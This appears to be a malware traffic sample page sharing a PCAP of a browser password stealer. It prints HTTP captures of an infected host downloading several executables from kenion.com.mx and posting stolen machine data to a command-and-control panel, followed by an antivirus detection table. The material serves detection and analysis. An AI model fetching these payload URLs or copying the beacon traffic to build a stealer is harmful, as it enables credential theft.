POST /xx/Panel/fre.php kenion.com.mx RAT Browser Password Stealer Malware PCAP file download Traffic Sample

Download Attachments

  • 1 pcap xxcrypted
    Date added: November 30, 2017 2:43 am Added by: admin File size: 113 KB Downloads: 10


2017-11-29 20:01:13.251874 IP 192.168.1.102.51041 > 108.179.194.43.80: Flags [P.], seq 3799269095:3799269589, ack 1911259101, win 256, length 494: HTTP: GET /doro/xxcryptrd.exe HTTP/1.1
E...8?@........fl..+.a.P.t>.q...P....H..GET /doro/xxcryptrd.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:32.257071 IP 192.168.1.102.51041 > 108.179.194.43.80: Flags [P.], seq 494:984, ack 815851, win 2744, length 490: HTTP: GET /doro/stain.exe HTTP/1.1
E...9^@........fl..+.a.P.t@.q...P.
.....GET /doro/stain.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:37.657627 IP 192.168.1.102.51042 > 185.115.242.195.80: Flags [P.], seq 1302127423:1302127670, ack 2428225756, win 256, length 247: HTTP: POST /xx/Panel/fre.php HTTP/1.0
E...iP@..."C...f.s...b.PM..?....P...x...POST /xx/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: estedoctorhair.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 6F8D7C5C
Content-Length: 208
Connection: close

2017-11-29 20:01:37.811087 IP 192.168.1.102.51042 > 185.115.242.195.80: Flags [P.], seq 247:455, ack 1, win 256, length 208: HTTP
E...iQ@..."i...f.s...b.PM..6....P...t.....'.......ckav.ru..
...r.y.4.w.n.......W.I.N.-.1.O.C.0.S.U.P.R.H.6.P.......W.I.N.-.1.O.C.0.S.U.P.R.H.6.P.....................k.................0...0.F.A.3.C.D.3.6.4.4.2.7.5.8.4.B.0.C.A.7.C.E.5.6.....HUKbe....
2017-11-29 20:01:38.556372 IP 192.168.1.102.51043 > 185.115.242.195.80: Flags [P.], seq 2513439678:2513439925, ack 1115178723, win 256, length 247: HTTP: POST /xx/Panel/fre.php HTTP/1.0
E...iV@..."=...f.s...c.P....BxF.P....<..POST /xx/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: estedoctorhair.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 6F8D7C5C
Content-Length: 208
Connection: close

2017-11-29 20:01:38.708255 IP 192.168.1.102.51043 > 185.115.242.195.80: Flags [P.], seq 247:455, ack 1, win 256, length 208: HTTP
E...iW@..."c...f.s...c.P....BxF.P.........'.......ckav.ru..
...r.y.4.w.n.......W.I.N.-.1.O.C.0.S.U.P.R.H.6.P.......W.I.N.-.1.O.C.0.S.U.P.R.H.6.P......................+................0...0.F.A.3.C.D.3.6.4.4.2.7.5.8.4.B.0.C.A.7.C.E.5.6.....1K1CK....
2017-11-29 20:01:51.440066 IP 192.168.1.102.51041 > 108.179.194.43.80: Flags [P.], seq 984:1477, ack 1901526, win 2747, length 493: HTTP: GET /doro/ladipony.exe HTTP/1.1
E...:.@........fl..+.a.P.tB.r...P.
.....GET /doro/ladipony.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:51.567952 IP 192.168.1.102.51041 > 108.179.194.43.80: Flags [P.], seq 1477:1845, ack 1906198, win 2748, length 368: HTTP: GET /cgi-sys/js/simple-expand.min.js HTTP/1.1
E...:.@........fl..+.a.P.tD.r...P.
.....GET /cgi-sys/js/simple-expand.min.js HTTP/1.1
Accept: */*
Referer: http://kenion.com.mx/doro/ladipony.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:51.682603 IP 192.168.1.102.51044 > 151.139.237.113.80: Flags [P.], seq 663312641:663312995, ack 1475467799, win 256, length 354: HTTP: GET /jquery-1.9.1.js HTTP/1.1
E...*.@........f...q.d.P'.Y.W...P.......GET /jquery-1.9.1.js HTTP/1.1
Accept: */*
Referer: http://kenion.com.mx/doro/ladipony.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: code.jquery.com
Connection: Keep-Alive

2017-11-29 20:01:51.952649 IP 192.168.1.102.51045 > 108.179.194.43.80: Flags [P.], seq 330237517:330237885, ack 584175579, win 256, length 368: HTTP: GET /cgi-sys/js/simple-expand.min.js HTTP/1.1
E...:.@........fl..+.e.P...M"...P.......GET /cgi-sys/js/simple-expand.min.js HTTP/1.1
Accept: */*
Referer: http://kenion.com.mx/doro/ladipony.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:52.021644 IP 192.168.1.102.51045 > 108.179.194.43.80: Flags [P.], seq 368:725, ack 1408, win 251, length 357: HTTP: GET /cgi-sys/images/x.png HTTP/1.1
E...:.@........fl..+.e.P...."..ZP...s...GET /cgi-sys/images/x.png HTTP/1.1
Accept: */*
Referer: http://kenion.com.mx/doro/ladipony.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:52.084717 IP 192.168.1.102.51045 > 108.179.194.43.80: Flags [P.], seq 725:1089, ack 4297, win 256, length 364: HTTP: GET /cgi-sys/images/404top_w.jpg HTTP/1.1
E...:.@........fl..+.e.P.. ""...P...Z...GET /cgi-sys/images/404top_w.jpg HTTP/1.1
Accept: */*
Referer: http://kenion.com.mx/doro/ladipony.exe
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:01:56.316040 IP 192.168.1.102.51048 > 185.115.242.195.80: Flags [P.], seq 247:428, ack 1, win 256, length 181: HTTP
E...i]@..."x...f.s...h.P.....pe.P....2....(.......ckav.ru..
...r.y.4.w.n.......W.I.N.-.1.O.C.0.S.U.P.R.H.6.P.......W.I.N.-.1.O.C.0.S.U.P.R.H.6.P......................0...0.F.A.3.C.D.3.6.4.4.2.7.5.8.4.B.0.C.A.7.C.E.5.6.
2017-11-29 20:02:00.531476 IP 192.168.1.102.51045 > 108.179.194.43.80: Flags [P.], seq 1089:1581, ack 8850, win 256, length 492: HTTP: GET /doro/crypted.exe HTTP/1.1
E...:.@........fl..+.e.P..
."..lP....v..GET /doro/crypted.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:02:17.640089 IP 192.168.1.102.51046 > 108.179.194.43.80: Flags [P.], seq 362:853, ack 337, win 255, length 491: HTTP: GET /doro/africa.exe HTTP/1.1
E...< @........fl..+.f.P..l.y...P.......GET /doro/africa.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: kenion.com.mx
Connection: Keep-Alive

2017-11-29 20:02:51.417112 IP 192.168.1.102.51049 > 66.171.248.178.80: Flags [P.], seq 2814971291:2814971366, ack 1344969828, win 256, length 75: HTTP: GET / HTTP/1.1
E..s,.@.... ...fB....i.P....P*.dP.......GET / HTTP/1.1
Host: bot.whatismyipaddress.com
Connection: Keep-Alive

2017-11-29 20:02:57.405090 IP 192.168.1.102.51051 > 185.115.242.195.80: Flags [P.], seq 1441112571:1441112818, ack 42778969, win 256, length 247: HTTP: POST /xx/Panel/fre.php HTTP/1.0
E...ib@..."1...f.s...k.PU......YP...?`..POST /xx/Panel/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: estedoctorhair.com
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: 6F8D7C5C
Content-Length: 181
Connection: close

46 engines detected this file
SHA-256 d9a44b31bfde7395266063597831eb08aa399dadc9a63523daee4918aabb5d34
File name 64272963f1afd4b648294f716aea0737.exe
File size 796.5 KB
Last analysis 2017-11-29 23:59:23 UTC
Community score -46

Engine               Detection
Ad-Aware             Trojan.Agent.CRAT
AegisLab             Troj.Agent.Crat!c
AhnLab-V3            Trojan/Win32.Inject.R213890
ALYac                Trojan.Agent.CRAT
Antiy-AVL            Trojan/MSIL.Crypt
Arcabit              Trojan.Agent.CRAT
Avast                Win32:Malware-gen
AVG                  Win32:Malware-gen
Avira                TR/AD.BrowserPwdStealer.kaouc
AVware               Trojan.Win32.Generic!BT
BitDefender          Trojan.Agent.CRAT
CrowdStrike Falcon   malicious_confidence_100% (W)
